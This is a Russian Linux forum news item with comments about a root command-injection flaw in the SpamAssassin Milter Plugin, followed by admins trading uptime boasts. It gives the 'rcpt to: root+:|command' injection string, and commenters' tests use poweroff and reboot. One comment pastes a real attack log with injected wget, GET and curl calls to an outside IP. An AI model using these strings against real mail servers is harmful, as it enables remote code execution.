LINUX.ORG.RU

Критическая уязвимость в SpamAssassin Milter Plugin


0

0

Уязвимость позволяет выпонить любой код на сервере с root. Для этого достаточно отравить письмо в поле «rcpt to» находится строка «root+:|команда»). Например - «root+:poweroff». Проблема касается абсолютно всех MTA поддерживающих milter.

>>> Подробности



Проверено: hibou ()

не работает sendmail[6982]: o2L9p2E3006900: to=/dev/null, ctladdr=root:+/sbin/reboot (8/0), delay=00:00:07, xdelay=00:00:00, mailer=*file*, pri=30310, dsn=2.0.0, stat=Sent

anonymous
()
Ответ на: комментарий от anonymous

разумеется неработает..

Саныч постарался.. :-)

mkfifo
()

Ну я так понимаю, прежде всего МТА должен исполняться с правами root, чтобы код от рута исполнить?

Далее, EXIM:

root@mail:~# cat /root/test3
#!/bin/bash
echo 1 > /root/mailtest
root@mail:~# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220-Welcome on our mail server!
220-This system does not accept Unsolicited Commercial Email
220-and will blacklist offenders via our spam processor.
220-Have a nice day!
220-
220 domain.ru ESMTP
helo domain.ru
250 domain.ru Hello localhost [127.0.0.1]
mail from: root@domain.ru
250 OK
rcpt to: root+:|/root/test3
501 root+:|/root/test3: missing or malformed local part (expected word or «<»)
^]
telnet> quit
Connection closed.
root@mail:~# cat /root/mailtest
cat: /root/mailtest: No such file or directory
root@mail:~#

su
()
Ответ на: комментарий от r0mik

> да настройте уже нормально свои MTA!

Тут прозвучала правильная идея - изучить, как работает milter. каллбэки вызываются не после, а во время отработки. Я только сейчас не помню, до соответствующей стадии, или после. Может быть до.

AS ★★★★★
()
Ответ на: комментарий от ZigmunD

> exim 4.69-28.1

spamassassin 3.2.4-29.1


Где здесь spamassassin milter plugin ? :-)

AS ★★★★★
()

Я думаю только ленивые не настроили правильно. Но в этом случае так им и надо.

pepsinaft
()
Ответ на: комментарий от AS

> Я только сейчас не помню, до соответствующей стадии, или после. Может быть до.

В смысле, до или после правил MTA на соответствующей стадии. Если до, все эти «настрой МТА правильно» не прокатят.

AS ★★★★★
()
Ответ на: комментарий от unixnik

>uptime 2 дня 19 часов. + мультимедиа что лин не осилит

О, пошло мерянье [s]пись[/s] аптаймом.

Вантуз осилит аптайм 402 дня 19 часов (and counting) + сервер много-чего + рутер + периодическая компиляция (ибо Gentoo) ?

anonymous
()
Ответ на: комментарий от anonymous

root@mail:~# cat /etc/slackware-version
Slackware 11.0.0
root@mail:~# uptime
12:03:43 up 411 days, 19:00, 1 user, load average: 0.02, 0.06, 0.09
root@mail:~#

Учитесь, сэр!

su
()
Ответ на: комментарий от bolmer

12:03:43 up 411 days, 19:00, 1 user, ***load average: 0.02, 0.06, 0.09***
12:38pm up 531 days, 3:15, 2 users, ***load average: 0.00, 0.00, 0.00***

Засуньте свои аптаймописькомерки с таким LA обратно в свои кладовки и ещё пару лет про них не вспоминайте

Lumi ★★★★★
()
Ответ на: комментарий от WARNING

SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected «rcpt to: root+:»|wget http://61.100.185.177/busy-1.php«» H=(bluedick) [68.236.170.186] I=[my-ip]:25 next input=«rcpt to: root+:»|GET http://61.100.185.177/busy-2.php«\r\nrcpt to: root+:»|curl http://61.100.185.177/busy-3.php«\r\ndata\r\n.\r\nquit\r\n»

правда спамасасина нету

anonymous
()
Ответ на: комментарий от Lumi

Ну это вы зря. :) Поскольку серверок почтовый, у него очень хорошо плавает LA.

Самое высокое - по утрам, когда все юзверята одновременно приходят и начинают качать накопленную за ночь эту нашу почту. Там ЛА доходит до 20.

Вообще, серверок обрабатывает в среднем где-то 150-200 писем в минуту (то есть, 2-4 письма в секунду).

su
()
Ответ на: комментарий от Lumi

> Засуньте свои аптаймописькомерки с таким LA обратно в свои

кладовки и ещё пару лет про них не вспоминайте


А вот не надо допускать большой LA. ;-) Максимум - это количество ядер. Если регулярно превышает - это сигнал к апгрейду.

AS ★★★★★
()
Ответ на: комментарий от su

> 12:03:43 up 411 days, 19:00, 1 user, load average: 0.02, 0.06, 0.09
root@mail:~#

Учитесь, сэр!


Да ладно...
18:02:52 up 452 days, 2:29, 4 users, load average: 0.19, 0.23, 0.19

;-)

AS ★★★★★
()
Ответ на: комментарий от AS

> Максимум - это количество ядер.
Спасибо, капитан, я в курсе

***load average: 0.00, 0.00, 0.00***

Сколько здесь ядер?

Lumi ★★★★★
()
Ответ на: комментарий от Lumi

Можно съэкономить выключив этот сервер!

catap ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.